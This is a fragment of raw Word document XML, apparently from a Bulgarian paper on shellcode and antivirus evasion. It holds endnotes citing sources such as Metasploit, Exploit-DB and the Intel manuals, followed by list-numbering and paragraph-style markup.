      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Torvalds L., </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>Re: [Regression w/ patch] Media commit causes user space to misbahave</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://lkml.org/lkml/2012/12/23/75</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="24">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> x64 calling convention</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=vs-2017</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="25">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Windows API Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="26">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> API reference for Universal Windows Platform (UWP) apps</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://docs.microsoft.com/en-us/uwp/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="27">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>On Windows Syscall Mechanism and Syscall Numbers Extraction Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="28">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pwntools, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://github.com/Gallopsled/pwntools</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="29">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://github.com/rapid7/metasploit-framework</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="30">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Program Argument Syntax Conventions, https://www.gnu.org/software/libc/manual/html_node/Argument-Syntax.html</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="31">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Beating Windows Defender. Analysis of Metasploit's new evasion modules, </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://idafchev.github.io/research/2019/01/23/beating_defender.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:endnote>
  <w:endnote w:id="32">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Veil-Ordnance</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://github.com/Veil-Framework/Veil-Ordnance/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="33">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> LINUX's History</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://www.cs.cmu.edu/~awb/linux.history.html</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="34">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Intel® 64 and IA-32 ArchitecturesSoftware Developer’s ManualCombined Volumes:1, 2A, 2B, 2C, 2D, 3A, 3B, 3C, 3D and 4</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="005E60F7">
          <w:t>https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E60F7">
        <w:tab/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="35">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Configuring ASLR with randomize_va_space</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:endnote>
  <w:endnote w:id="36">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> How Payloads Work</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="37">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> Exploit Database Shellcodes </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://www.exploit-db.com/shellcodes</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="38">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberchef, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://gchq.github.io/CyberChef/</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="39">
    <w:p w:rsidR="00875CB1" w:rsidRPr="005E60F7" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t xml:space="preserve"> fdisk(8) - Linux man page</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:t>https://linux.die.net/man/8/fdisk</w:t>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:id="40">
    <w:p w:rsidR="00875CB1" w:rsidRPr="004E4FA6" w:rsidRDefault="00875CB1" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:endnoteRef/>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is the loop instruction slow?</w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="005E60F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/35742570/why-is-the-loop-instruction-slow-couldnt-intel-have-implmented-it-efficiently</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8622594"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00875CB1" w:rsidRDefault="00875C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75CB1" w:rsidRDefault="00875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2214" w:rsidRDefault="00A02214">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A02214" w:rsidRDefault="00A0221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86948"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D0CC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73B0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="729C3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F1E53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DE8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C38B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEA6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B77D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A4422A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F8AA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9B34DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99EA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977DEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAA0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14A189A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE5CBDEC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>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5D72957"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A72B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A8054F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="968C0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1F1816"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAA0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F2D5305"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62A24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D26C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96C47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E417B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2A8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0848AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="941EE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043063"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAA0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7930F86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98267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D04AA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="316EA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AD5198"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="696026AC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="H1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:p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20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="59462736"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F014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CD6522"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40F09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02432"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B414E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813CCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D3C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0E2B03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="785E1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233E0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E306E0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71D19FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1EA0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754FA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAA0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BEA00AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAA0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CE65E2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="734A3E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D754B1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCB4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CF4115"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04628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15240D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DEEB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8"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="33">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activeWritingStyle w:appName="MSWord" w:lang="en-US" w:vendorID="64" w:dllVersion="6" w:nlCheck="1" w:checkStyle="0"/>
  <w:activeWritingStyle w:appName="MSWord" w:lang="en-US" w:vendorID="64" w:dllVersion="4096" w:nlCheck="1" w:checkStyle="0"/>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2A1"/>
    <w:rsid w:val="000878DE"/>
    <w:rsid w:val="000B2140"/>
    <w:rsid w:val="001009CF"/>
    <w:rsid w:val="00112660"/>
    <w:rsid w:val="001369F1"/>
    <w:rsid w:val="001E0963"/>
    <w:rsid w:val="00253B3A"/>
    <w:rsid w:val="00303E70"/>
    <w:rsid w:val="00326004"/>
    <w:rsid w:val="00396D23"/>
    <w:rsid w:val="003A6EB4"/>
    <w:rsid w:val="004B2072"/>
    <w:rsid w:val="004E4FA6"/>
    <w:rsid w:val="004F4299"/>
    <w:rsid w:val="00532C4C"/>
    <w:rsid w:val="00543FBF"/>
    <w:rsid w:val="00567E8F"/>
    <w:rsid w:val="005D2D2A"/>
    <w:rsid w:val="005E60F7"/>
    <w:rsid w:val="005F56EB"/>
    <w:rsid w:val="005F5FC6"/>
    <w:rsid w:val="00604C58"/>
    <w:rsid w:val="006150B9"/>
    <w:rsid w:val="00667C19"/>
    <w:rsid w:val="006A4DF3"/>
    <w:rsid w:val="006F0F40"/>
    <w:rsid w:val="008227E1"/>
    <w:rsid w:val="00864054"/>
    <w:rsid w:val="00875CB1"/>
    <w:rsid w:val="008B3BD0"/>
    <w:rsid w:val="009056AE"/>
    <w:rsid w:val="00A02214"/>
    <w:rsid w:val="00A477A1"/>
    <w:rsid w:val="00B03C38"/>
    <w:rsid w:val="00B4067A"/>
    <w:rsid w:val="00B5799F"/>
    <w:rsid w:val="00B829C8"/>
    <w:rsid w:val="00B8642F"/>
    <w:rsid w:val="00BC554D"/>
    <w:rsid w:val="00C23AD4"/>
    <w:rsid w:val="00C2774A"/>
    <w:rsid w:val="00C36BC3"/>
    <w:rsid w:val="00C61194"/>
    <w:rsid w:val="00CC22A1"/>
    <w:rsid w:val="00CE1482"/>
    <w:rsid w:val="00CF6AEC"/>
    <w:rsid w:val="00D4593C"/>
    <w:rsid w:val="00DC3933"/>
    <w:rsid w:val="00DD0DC6"/>
    <w:rsid w:val="00DE5A50"/>
    <w:rsid w:val="00E242A9"/>
    <w:rsid w:val="00EA3DCB"/>
    <w:rsid w:val="00EF4844"/>
    <w:rsid w:val="00F43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1538B"/>
  <w15:docId w15:val="{D2AB5DD4-8396-466B-ABDC-77F713B5B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bg"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qFormat/>
    <w:rsid w:val="005D2D2A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="400" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:caps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="005E60F7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="005E60F7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="320" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="005E60F7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>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11266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660"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="body">
    <w:name w:val="body"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="bodyChar"/>
    <w:qFormat/>
    <w:rsid w:val="00DE5A50"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="H1">
    <w:name w:val="H1"/>
    <w:basedOn w:val="body"/>
    <w:link w:val="H1Char"/>
    <w:rsid w:val="00604C58"/>
